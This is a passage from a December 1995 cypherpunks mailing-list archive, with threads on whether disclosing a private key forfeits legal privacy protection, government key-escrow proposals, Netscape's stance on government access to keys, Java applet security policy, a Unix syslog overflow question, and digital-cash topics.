that anyone was claiming that one could break the attorney client trust 
on this basis.  However, I think, as a tangential matter, a court will 
examine very closely a claim that keys protected by such a trust can not 
be used as evidence.  To hold this so broadly would be to tell the 
criminal he merely needs to give the weapon used in a crime to his 
attorney to prevent its introduction.

You also need to make a distinction between a 4th amendment matter (which 
is the issue at hand) and the seperate and distinct protection of the 
attorney client relationship.

"A person has no legitimate expectation of privacy in information he 
voluntarily turns over to third parites."  _Smith v. Maryland_, 442 U.S. 
735 (1979); _California v. Greenwood_, 486 U.S. 35 (citing Smith) (1988).

> --Tim May
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 7 Dec 95 18:49:03 PST
To: sameer <sameer@c2.org>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <199512080227.SAA15534@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951207214329.6540D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, sameer wrote:

> > > You mean if you give me your key the police can get it from me without a
> > > warrant? What if I don't want to give it up, and you don't? How would the
> > > police get it without a warrant?
> > 
> > Yes.  Unless it could be shown there their was an expactation of privacy 
> > in the transfer, or that there was an understanding that you intended this 
> > to be a confidential matter.  Or in the alternative, that the 
> 
> 	I do not understand.
> 
> Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
> Bob "I want Alice's key, you need to give it to me. I don't have a
> warrant."
> 
> How is this different from
> Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key,
> you need to give it to me. I don't have a warrant."

The real concern is this:

Bob gives his key to alice.

The cops walk into alice's place and 'convince' alice to turn the key 
over whithout a warant.  Perhaps alice is more susceptible to 
persuasion because of some external reasons.  Alice does, Bob has no privacy
interest in the key, Bob can no longer argue that it is protected under 
the 4th amendment.

Now let's get more sinister.

The cops mysteriously 'find' the key somewhere without a warrant.
Bob cannot argue that the key should be surpressed on the basis of the 
4th amendment because he gave it to Alice, and thus clearly it's not 
information he was interested in protecting.  (This is assuming the cops 
didn't violate other areas, or break into a house or something, or that 
if they did, that the court will find out about it).

That's the rationale.

> 	sheesh, what a fucked up legal system.

Indeed.

> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 7 Dec 95 19:06:12 PST
To: cypherpunks@toad.com
Subject: GAK solutions was: Is there a lawyer in the house?
Message-ID: <79623.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Thu, 7 Dec 95 16:27:23 EST, cme@acm.org  writes:
> It could be even worse.  I was on a panel last year with Scott Charney
> (sp?) (I believe from DoJ) during which he commented that if you give
> your secret key to anyone -- e.g., your own company -- then you have
> given up the presumption of privacy.

Interesting. At the NIST meeting, criteria #5 deals with decrypting
a conversation with only the key from one end.

I thought that would be hard to implement. But during the discussion,
they called on Miles Smid [sp?] who was obviously a NIST employee/consultant
with real knowledge. He suggested that you could encrypt the
session key with the public key of both parties, and send it along.
This would allow single ended GAK.

This is not far from the idea that CME proposed that the NSA/FBI/CIA
publish public keys, and we'll hack a voluntary version of PGP that
encrypts the session key with the LEA public key -- instant
voluntary Key Escrow.

Miles Smid's idea seemed reasonable, until you realize that he intends
you to escrow your private key...

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 7 Dec 95 19:06:06 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Java musings
Message-ID: <199512080311.WAA02282@homeport.org>
MIME-Version: 1.0
Content-Type: text



Some musings on policies, threats and liabilities of Java, Livescript
and other downloadable applets.

I. Policies.

	The recent Livescript problem was predictable.  Building an
execution environment to safely handle all the myriad of tricks that
programmers will throw at it is not a simple or easy task.  People
will make mistakes in the design and execution of these environments.  

	Right now, many people are chasing the idea of applets; its
neat, sexy, and everyone wants in.  But, for many users, and many
environments, certain capabilities may be inappropriate.

	There has already been loud complaining in many forums about
the lack of site configurable Certification authorities, lack of site
control over Java features.  A site needs to be able to decide who to
trust, and who should be able to make these decisions, in a manner
that a user can not easily override.  The ease of configuration of
trust parameters in Netscape is neat for personal use, but
inappropriate for business.  When Java gets its ability to check
signatures, expect complaints about lack of site configuration of
trust hierarchies. (Yes, as opposed to web of trust.  As a bank, I
want to be able to control what code can run with a very explicit
hierarchy.)

	All applets are not created equal.

	All user requirements are not equal.

	Applets are not created equal.  Some are created in house to
do certain things, like watch the price of two stocks relative to one
another.  If an applet is created in house, signed off on by the
InfoSec people, then there's no reason (assuming strong integrity
checking) to deny it access to local disk, arbitrary network access,
etc.

	However, for various reasons (notably compartmentalization,
aka defense in depth), it is desirable to restrict disk (and possibly
network) access to certain addresses.  Something akin to chroot(),
tagging of packets outside the applications control to make firewall
filtering easy, filtering of available addresses to send to (only talk
on local subnet).  The ability to assign various levels of privilege
to code that runs on a virtual machine will be essential.  The ability
to limit these privileges must be reserved in some way to those with
site security responsibilities.   The security people, in turn, will
need the ability to delegate.

	This can perhaps be provided based on a least trusted basis.
Code starts out in a small, tight environment, with no access to
anything other than the (protected) processor, and a promote()
function which does authorization checking before granting new levels
of privileges in certain areas.

	Access to disk, access to local and remote network services,
and the ability to pull the browser to a new URL are all privileges
that should be orthogonally configurable, by site, by machine, or by
applet.

	All user requirements are not equal.

	This should be obvious.  Not all users need Java or
Livescript.  If a user is using Netscape to look at man pages, access
to Java and livescript is not very important.  Access to unsigned Java
applets may or may not meet the site security policy.  At home, I
might happily look at them.  In the office, I might have a very
different approach.

	A bank teller might need access to applets developed by the
bank for various things, but not need access to anything over the
internet.  He would need to be able to access the local lan servers.

	The need of users to get to different resources, and work
under different levels of protection calls out for mandatory strong
authentication in applets.  In other words, a better design might be
only execute applets with some (verified) signature attached to them.

	The language in which the applet was written is important.
More important is the ability of users and management to set policies,
and see those policies enforced by applications.  I could then set my
browser only to run Livescripts signed by someone I know (or an agency
that vets them for bugs), and only run Java with minimal trust in the
absence of signatures.



II.  Threats and liabilities


	A malicious applet, running amok on a machine, with the same
disk & network access as a user, can send off to the world anything it
thinks interesting.  However, there are times when letting an applet
at certain files, or giving it heavy network access, might be very
useful.

	I'll take as an example Anderson Consulting's demo
BargainFinder (http://bf.cstar.ac.com/bf/).  BargainFinder is a way to
search 9 music stores on the web for an album, with one form.  3 of
the stores are blocking the searches. In addition, a cypherpunk might
wonder if the searches and their origins are being logged.

	Thats not very useful for those of us who look forward to
perfect marketplace information for consumer goods.  Let me sketch
BargainFinder2, as powered by Java.  Instead of going to Anderson for
the page, you download BF to your local machine.  It does the
searching, same as BF1 did, but with no blocking possible.  You find
your CD at the best price.  Perhaps BF is rental-ware, perhaps its
someone advertising their Java coding skills.

	But its clear that this applet needs to be able to access the
network freely.  Its also plain that it won't be written for 6
platforms.  It might be written for Windows, but the Java market might
be larger still, and thus more attractive.  (Not to mention that the
network interface is mostly taken care of.  no Winsock version
worries.)

	Other applets, say a Ecash wallet manager that interfaces with
Quicken, needs access to your local disk, and needs to be able to
respond to incoming network queries from shops.

	Granular control of the access that applets have thus seems to
be needed.  Making Java 'secure' is not enough, because people will
'turn off' all the security to make one applet work.

	It might also be interesting to consider automatically
updating software, that can replace itself from time to time, after
verifying that a signature is correct.  Although, that does raise the
value of stealing a key from some well known, trusted applet vendor.

	To summarize, 'security' in the vauge sense that Java
promises, while useful, needs granularity to allow it to fulfill its
potential.

	Comments are welcome.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Thu, 7 Dec 95 19:24:21 PST
To: pfarrell@netcom.com
Subject: Re: GAK solutions was: Is there a lawyer in the house?
Message-ID: <199512080324.WAA22651@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


[By the way, I know that my sig on that message was bogus.  I made the
mistake of editing the message after signing it and sent it before
I stopped to think.]

>Date: Thu, 07 Dec 1995 22:07:00 -0400 (EDT)
>From: Pat Farrell <pfarrell@netcom.com>
>Subject: GAK solutions was: Is there a lawyer in the house?

>Interesting. At the NIST meeting, criteria #5 deals with decrypting
>a conversation with only the key from one end.
>
>I thought that would be hard to implement. But during the discussion,
>they called on Miles Smid [sp?] who was obviously a NIST employee/consultant
>with real knowledge. He suggested that you could encrypt the
>session key with the public key of both parties, and send it along.
>This would allow single ended GAK.

Miles Smid is a NIST employee who is quite knowledgeable about crypto
and Clipper.

>This is not far from the idea that CME proposed that the NSA/FBI/CIA
>publish public keys, and we'll hack a voluntary version of PGP that
>encrypts the session key with the LEA public key -- instant
>voluntary Key Escrow.

I still think that's the only way the gov't will get GAK -- :)

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 7 Dec 95 19:33:00 PST
To: cypherpunks@toad.com
Subject: Strange Unix behavior dealing with utmp - anyone recognize this?
Message-ID: <9512080330.AA27098@all.net>
MIME-Version: 1.0
Content-Type: text


I was sending out a few hundred 25K emails over a period of a minute or so
when my systemn encountered this thrilling sequence:

Dec  7 22:11:56 all vmunix: file:<3>zs1: silo overflow
Dec  7 22:11:57 all syslogd: /etc/utmp: File table overflow
Dec  7 22:11:56 all vmunix:  table is ful<3>zs1: silo overflow

It appears to be some sort of file table overflow related to the syslog
daemon.  The message repeats numerous times and I think it has to do
with the number of messages sent over a short time, however:

	I regularly send far more messages without this error
	It lost the processes that were generating these messages
		so I had to redo part of the mailing.

Does anyone recognize the symptom, and does this open a potential for
attack by stress?  (e.g., if you can get something to fail in this way
can the failure cause something to be missed?)

Just thought I'd mention it.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 7 Dec 95 22:34:57 PST
To: cypherpunks@toad.com
Subject: the X.9 Electronic Payments ANSI standard
Message-ID: <199512080630.WAA17998@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	My inquiries regarding Rich's post of the X.9 informal notes
were rather fruitful. The chair of the working group seems interesting
in including anonymous token-based payment systems in the standard, "I
see no reason, other than interest, for the group to avoid
non-account-based payment systems, to complement the account-based
payment systems that we are now in the process of standardizing."

	Someone from Citicorp pointed me to http://www.llnl.gov/fstc
and asked for my feedback.

	These people do seem interested in anonymous systems, they
just don't have anyone who knows the stuff to work on it. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Thu, 7 Dec 95 19:41:35 PST
To: pfarrell@netcom.com
Subject: Re: GAK solutions was: Is there a lawyer in the house?
Message-ID: <199512080342.WAA27745@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



>>This is not far from the idea that CME proposed that the NSA/FBI/CIA
>>publish public keys, and we'll hack a voluntary version of PGP that
>>encrypts the session key with the LEA public key -- instant
>>voluntary Key Escrow.
>
>I still think that's the only way the gov't will get GAK -- :)


Actually, the real proposal (http://www.clark.net/pub/cme/html/no-ke.html)
is to have them give me their public keys.  I would sign and post them.
The world's citizens would then add them to their public keyrings and, when
they feel like volunteering GAK, would include these agencies as
crypto-recipients -- on a per-message basis.

No meetings -- no hassle -- nearly 0 cost -- and the gov't could have GAK 
tomorrow.

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 7 Dec 95 14:11:14 PST
To: cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
In-Reply-To: <2.2b8.32.19951207150646.006874cc@panix.com>
Message-ID: <Pine.HPP.3.91.951207225242.6277A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Duncan Frissell wrote:

> Is there an existing Post Office Bank in Sweden?  If so, can foreigners open
> accounts?  The UK's postal bank (Girobank) has become more like a normal

Yes, Nordbanken. It started as a government owned Post Office bank but
was privatized years ago. It still is closely connected to Posten. I'm
sure a foreigner can open an account - the Swedish banking system is
very deregulated nowadays, and Sweden is (unfortunately) an EU member.

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 7 Dec 95 14:20:19 PST
To: cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
In-Reply-To: <199512071601.IAA23556@blob.best.net>
Message-ID: <Pine.HPP.3.91.951207225929.6277B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, James A. Donald wrote:

> I would wait for some more solvent foreign country to get into digicash.

The Swedish crown had a bad reputation after repeated devalvations
in the 70-80's. This trend has stopped, it seems, and trust has been
built up in the last year (1 US$ has dropped from 9 to 6.50).

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 8 Dec 95 23:23:53 PST
To: cypherpunks@toad.com
Subject: Re: Netscape speaks with a forked tongue:
Message-ID: <199512090724.XAA01834@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:11 AM 12/9/95 GMT, Dan Weinstein wrote:
> You are quoting a reporter and attributing it to Jim Clark, do you
> understand what is wrong with that?

Jim Clark has had ample opportunity to clarify his statements.

He has not clarified his statements and he has not disowned 
the reported version of his comments, despite repeated
requests to do so.

Once again I request him to do so.

Once again I ask what he means, once again I complain that 
if that is not what he meant, he should now say something that 
is unambiguously different from what he was reported as saying.

>It has been reported by those that attended the Clipper II meeting on
>Monday(?) that the Netscape representative read an official statement
>very much in opposition to GAK. 

I have not seen this statement, and I have asked for it:  Once again
I ask for it.  In particular I ask that it be placed on their web if
it says what they say that it says.

> > Jim Clark's  supposedly anti GAK statement was incomprehensible to me.
> > Perhaps he needs a punchier ghostwriter:

> Clark's statement was certainly something less than clearly in
> opposition to GAK, but I think at worst he could be said to be resigned
> to GAK, not a supporter of it.

It was worse than that:  he said nothing at all, the "clarification" 
statement was a cloudy fog.

> > If Jim Clark wishes to persuade us that his heart is in the right
> > place, he should put something like the following somewhere on the
> > Netscape web pages:
> >
> >    "Our customers do not want government access to
> >     their cryptographic keys.  Mandatory government
> >     access to keys violates the rights of our
> >     customers.  Therefore we will not foist
> >     government access to keys on those customers
> >     who have freedom to communicate securely.
> >
> >     We will only build government access to keys
> >     into our products for those customers whose
> >     governments force them to provide such access.
> >    "
> >
> > If that really is Netscape's policy, then they should tell the world
> > that that really is Netscape's policy, thus instantly relieving the
> > fear, uncertainty, and doubt created by the unfortunate widespread
> > misinterpretation of Jim Clark's original statements.


> Jeff Weinstein has promised that when the representative from the
> conference returns to Mountain View, they will publish his statement
> on web.

Still waiting.

I am sure that by now Netscape knows what its policy is on government
access to keys:   I ask them to tell the world, and to tell the
world in such a way that they cannot retract their words without
some embarrassment.


> Again, you seem fixated on making Clark's opinions equivelent to the
> position of Netscape Communications Corp, this is not a reasonable
> assumption.

Clark is not a Netscape employee.

Clark owns a controlling interest in Netscape and is chairman of the board.
Netscape's policies are whatever he says they are, except in the highly 
unlikely event that he is opposed by both Jim Barksdale and Kleiner Perkins 
plus a substantial majority of the lesser shareholders.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 8 Dec 95 23:24:05 PST
To: cypherpunks@toad.com
Subject: Re: Netscape speaks with a forked tongue:
Message-ID: <199512090725.XAA02509@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:11 AM 12/9/95 GMT, Dan Weinstein wrote:
> You are quoting a reporter and attributing it to Jim Clark, do you
> understand what is wrong with that?

Jim Clark has had ample opportunity to clarify his statements.

He has not clarified his statements and he has not disowned 
the reported version of his comments, despite repeated
requests to do so.

Once again I request him to do so.

Once again I ask what he means, once again I complain that 
if that is not what he meant, he should now say something that 
is unambiguously different from what he was reported as saying.

>It has been reported by those that attended the Clipper II meeting on
>Monday(?) that the Netscape representative read an official statement
>very much in opposition to GAK. 

I have not seen this statement, and I have asked for it:  Once again
I ask for it.  In particular I ask that it be placed on their web if
it says what they say that it says.

> > Jim Clark's  supposedly anti GAK statement was incomprehensible to me.
> > Perhaps he needs a punchier ghostwriter:

> Clark's statement was certainly something less than clearly in
> opposition to GAK, but I think at worst he could be said to be resigned
> to GAK, not a supporter of it.

It was worse than that:  he said nothing at all, the "clarification" 
statement was a cloudy fog.

> > If Jim Clark wishes to persuade us that his heart is in the right
> > place, he should put something like the following somewhere on the
> > Netscape web pages:
> >
> >    "Our customers do not want government access to
> >     their cryptographic keys.  Mandatory government
> >     access to keys violates the rights of our
> >     customers.  Therefore we will not foist
> >     government access to keys on those customers
> >     who have freedom to communicate securely.
> >
> >     We will only build government access to keys
> >     into our products for those customers whose
> >     governments force them to provide such access.
> >    "
> >
> > If that really is Netscape's policy, then they should tell the world
> > that that really is Netscape's policy, thus instantly relieving the
> > fear, uncertainty, and doubt created by the unfortunate widespread
> > misinterpretation of Jim Clark's original statements.


> Jeff Weinstein has promised that when the representative from the
> conference returns to Mountain View, they will publish his statement
> on web.

Still waiting.

I am sure that by now Netscape knows what its policy is on government
access to keys:   I ask them to tell the world, and to tell the
world in such a way that they cannot retract their words without
some embarrassment.


> Again, you seem fixated on making Clark's opinions equivelent to the
> position of Netscape Communications Corp, this is not a reasonable
> assumption.

Clark is not a Netscape employee.

Clark owns a controlling interest in Netscape and is chairman of the board.
Netscape's policies are whatever he says they are, except in the highly 
unlikely event that he is opposed by both Jim Barksdale and Kleiner Perkins 
plus a substantial majority of the lesser shareholders.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 7 Dec 95 20:26:00 PST
To: adam@obscura.com (Adam philipp)
Subject: Re: Netscape stock on 12/7/95
In-Reply-To: <9512072217.AA16206@toad.com>
Message-ID: <199512080426.XAA06122@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 16% tumble today...
> 
>    ...is the word getting out?

  I don't think it is a coincidence that Microsoft also made their
major announcements today. I doubt the feeding frenzy over Internet
related stocks and technology is even close to over. Having seen
the new Shockwave plugin for Netscape, I expect Macromedia stock
to go up again soon. (it already went up 50% after the original Netscape
announcement of Director integration)
 
-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Thu, 7 Dec 95 23:27:16 PST
To: Rich Graves <cypherpunks@toad.com
Subject: Re: FW: websurfer 4.6
Message-ID: <199512080648.AAA30444@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 7 Dec 1995 15:12:07 -0500
> Subject:       Re: FW: websurfer 4.6
> To:            cypherpunks@toad.com
> From:          Rich Graves <llurch@networking.stanford.edu>

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Thu, 7 Dec 1995, Anonymous wrote:
> 
> > Not surprising. They confuse random doodling with software, too.
> > 
> > The real problem with NetManage is a severe case of brain death.
> 
> My, thanks for your opinion.
> 
> It may interest you to know that Microsoft recently licensed a bunch of 
> stuff from NetManage (San Jose Merc, no real details given).

Yeah, and they also think that Windoze is a real opearting system, 
too...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Thu, 7 Dec 95 23:26:41 PST
To: Aleph One <llurch@networking.stanford.edu
Subject: Re: [NOISE] Re: FW: websurfer 4.6
Message-ID: <199512080659.AAA31407@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 7 Dec 1995 15:49:09 -0600 (CST)
> From:          Aleph One <aleph1@dfw.net>
> To:            Rich Graves <llurch@networking.stanford.edu>
> Cc:            cypherpunks@toad.com
> Subject:       Re: [NOISE] Re: FW: websurfer 4.6

> On Thu, 7 Dec 1995, Rich Graves wrote:
> 
> [snip]
> > Microsoft's strategy is to support VB.
> [snip]
> > -rich
> > 
> 
> Its interesting to note that all the people that were raving mad about Java
> seem to be quiet now that MS is proposing to use VB. At least Java was 
> designed from the ground up with security in mind. But VB? Actual binary

Well, at least it's easy and fun to program in (if you can call 
drag-'n-drop "coding").  Of course, until 4.0, their setup utility 
didn't check what version of DLL you were installing, so it's easy to 
get your DLLs out of sync on your system and blow your applications 
all to hell, and 4.0 throws all thos OLE crap in, even if you don't 
need/want/use OLE in your code and makes a 300K application into a 3M 
one, and they won't tell you what really goes on underneath the hood 
(I guess they're paranoid about getting ripped off), and never mind 
that it's almost trivial to write a VB decompiler (the .EXE is just a 
big jump table into offsets into VBRUN300.DLL), etc., etc., etc...

And all this from a software company that took over 10 years to make 
their "operating system" do preemptive *anything*.

But I guess I shouldn't complain.  After all, VB has made me a pretty 
decent living for the past year or so...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: leefi@microsoft.com
Date: Fri, 8 Dec 95 00:27:21 PST
To: <cypherpunks@toad.com>
Subject: Re: Micro$oft and Java
Message-ID: <c=US%a=_%p=msft%l=RED-09-MSG951208002301SA006801@red-01-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


| The interesting thing here is a plan to use digital signatures on 
| controls and scripts as a means of authentication.

There was a press release on this. The PR index on 
http://www.microsoft.com/corpinfo/pr.htm points to a few 
Internet-related announcements that were made on 12/7. A brief 
quote on these signatures:

"Microsoft plans to propose the Internet digital signature 
specifications to the W3C and the IETF as an open Internet standard. 
The technology will be an open, proposed specification available to 
the entire Internet community.  In addition, as part of the Open 
Process Design Review, Microsoft will host a digital signature design
preview in January to solicit feedback from the Internet community."

This week there was also another workshop for ~150 ISVs, and these 
signatures were one of the topics. The event was not under any NDA, 
so you should start seeing feedback once folks get home and they 
catch up with mail (at least two were on Cypherpunks). The folks 
putting on the event have put lots of docs on the "Sweeper" SDK, on 
the below-referenced web site. Honestly, I'm not sure if all the stuff
from the event this week is up there; if not now, most of it will get
added in the next week or so.

| Servers and some clients will support end-to-end encryption.  No 
details...

I believe SSL in current versions of the web browser and server, PCT 
around the corner (perhaps PCT is earlier than I'm thinking).

| Maybe I'll test the search capabilities of the MS Web site later tonight.

The clearinghouse for internet developer info (opened 12/7):
  http://www.microsoft.com/intdev/
It contains info on various VB Script, OLE Control, etc, as they refer to 
some of our Internet solutions.

A page related to this press briefing (I presume also opened 12/7):
  http://www.microsoft.com/internet/

Hope this helps,
Lee Fisher
(wondering if I really should've de-lurked)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Dec 95 21:53:04 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.SUN.3.91.951207202351.6540B-100000@polaris.mindport.net>
Message-ID: <199512080554.AAA05788@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
> Yes.  I have seen holdings which indicate that information given to an 
> employer, where there was no obvious expection that it be kept 
> confidential, estopped 4th amendment protections to its introduction when 
> obtained without a warrant.
[...and...]
> Again, because of the nature of the relationship.  There is an 
> expectation that a conversation with an attorney is one of the most 
> private exchanges you can engage in.  As for rare exceptions, I'm not so 
> sure I would term them rare.

What happens if I disclose a key to my employer's corporate law firm ?
Does that clearly lie one way or the other, or would it likely hinge upon 
the conditions under which I came to reveal the key ?

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Fri, 8 Dec 95 17:17:26 PST
To: cypherpunks@toad.com
Subject: Netscape speaks with a forked tongue:
Message-ID: <199512090118.RAA10458@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Netscape speaks with a forked tongue:

Jim Clark, top guy and owner of netscape, has issued a statement in
support of government access to keys:


    "To secure Net communications, the government
      will need to have access to private data exchanges using
      what is known as a key escrow security system
     "

and he has issued a statement that Jeff (a netscape employee) has very
generously interpreted as anti GAK.  (Government access to keys)

The only clear and authoritative statement issued by Netscape on GAK
is Jim Clark's speech in support of GAK. Everything else is a cloud of
unintelligible fog, or was issued by people with no authority and
given a minimum of publicity.

Jim Clark's  supposedly anti GAK statement was incomprehensible to me.
Perhaps he needs a punchier ghostwriter:

I offer my services free of charge.  :-)

If Jim Clark wishes to persuade us that his heart is in the right
place, he should put something like the following somewhere on the
Netscape web pages:

    "Our customers do not want government access to
     their cryptographic keys.  Mandatory government
     access to keys violates the rights of our
     customers.  Therefore we will not foist
     government access to keys on those customers
     who have freedom to communicate securely.

     We will only build government access to keys
     into our products for those customers whose
     governments force them to provide such access.
    "

If that really is Netscape's policy, then they should tell the world
that that really is Netscape's policy, thus instantly relieving the
fear, uncertainty, and doubt created by the unfortunate widespread
misinterpretation of Jim Clark's original statements.

The only clear and authoritative statement issued by Netscape on GAK
is Jim Clark's speech in support of GAK. Everything else is a cloud of
unintelligible fog, or was issued by people with no authority and
given a minimum of publicity.




 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Fri, 8 Dec 95 00:43:08 PST
To: cypherpunks@toad.com
Subject: Secrets (was:Is there a lawyer in the house?)
Message-ID: <9512080843.AA03439@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   There seems to be some confusion about what the law of the land considers
a "secret." Secrets according to our laws are knowledge one doesn not share
without a BINDING legal obligation to keep the secret. 
   Remember R4.C? That was a secret until it was shared, and hence lost its
privileged position as a "Trade secret." 
   Your secret key is just as safe, so long as it is always kept out of
anyone else's hands. However if you are going to provide it to someone else
it should be only through some form of contract. Even this might not be
sufficient in some circumstances. The only truly safe possibility would be
giving it to your lawyer in the course of your lawyers representation of
you. NOTE: NOT YOUR COMPANY'S LAWYER. In house council have their obligation
to the company, not to you. As such if they felt your key was unrelated to
company business interests and possibly adverse to the company's
interest...kiss that secret good bye. 
   Sure, the police still need a warrant to go into your house and get the
key, but they do NOT need a warrant to ask anyone else for your key, if you
revealed your secret to someone who does not have an obligation of
confidentiality to you, then they can reveal it with impunity. The danger of
revealing it to a nonlawyer who has a contract with you is that they can be
forced to reveal it, and still be liable to you for breech of contract...

   I am sure you see the dangers...just say no to key escrow...much safer.

   -Adam

[NOTE: I am not an attorney, this is not legal advice, you get what you pay for]

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|  http://XXXXXXXXXXXXXXXXX/adam  |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
